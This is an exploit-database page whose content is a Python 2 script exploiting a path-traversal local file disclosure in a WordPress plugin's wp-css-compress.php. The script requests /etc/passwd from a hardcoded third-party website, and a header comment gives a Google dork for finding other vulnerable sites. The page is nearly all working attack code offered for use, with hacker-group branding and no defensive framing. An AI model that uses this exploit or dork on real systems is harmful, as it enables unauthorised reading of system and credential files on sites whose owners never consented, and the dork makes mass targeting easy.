WordPress Yoast v4.1.3 Local File Disclosure Vulnerability



EKU-ID: 877 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-08-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/bin/python

print "###########################################################################"
print "# Exploit Title:WordPress Yoast v4.1.3 Local File Disclosure Vulnerability#"
print "# Author:Angel Injection                                                  #"
print "# Home Page: http://dev-point.com http://sec-krb.org                      #"
print "# Exploit find By H7acker110                                              #"
print "# python exploit find By Miroslav Stampar                                 #"
print "# Note:Iam Angel Injection From the country of civilizations(iraq)        #"
print "# Google Dork:inurl:wp-css-compress.php?f=                                #"
print "###########################################################################"


 
import urllib2
 
FILEPATH = "/etc/passwd"
 
req = urllib2.urlopen("http://profitseo.com/wp-content/plugins/wp-css/wp-css-compress.php?f=../../../../../../../../../../%s" % FILEPATH)
 
print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())



#############################
print "Exploit Completed"
#############################
print "Inj3ct0r Team 4 ever"
#############################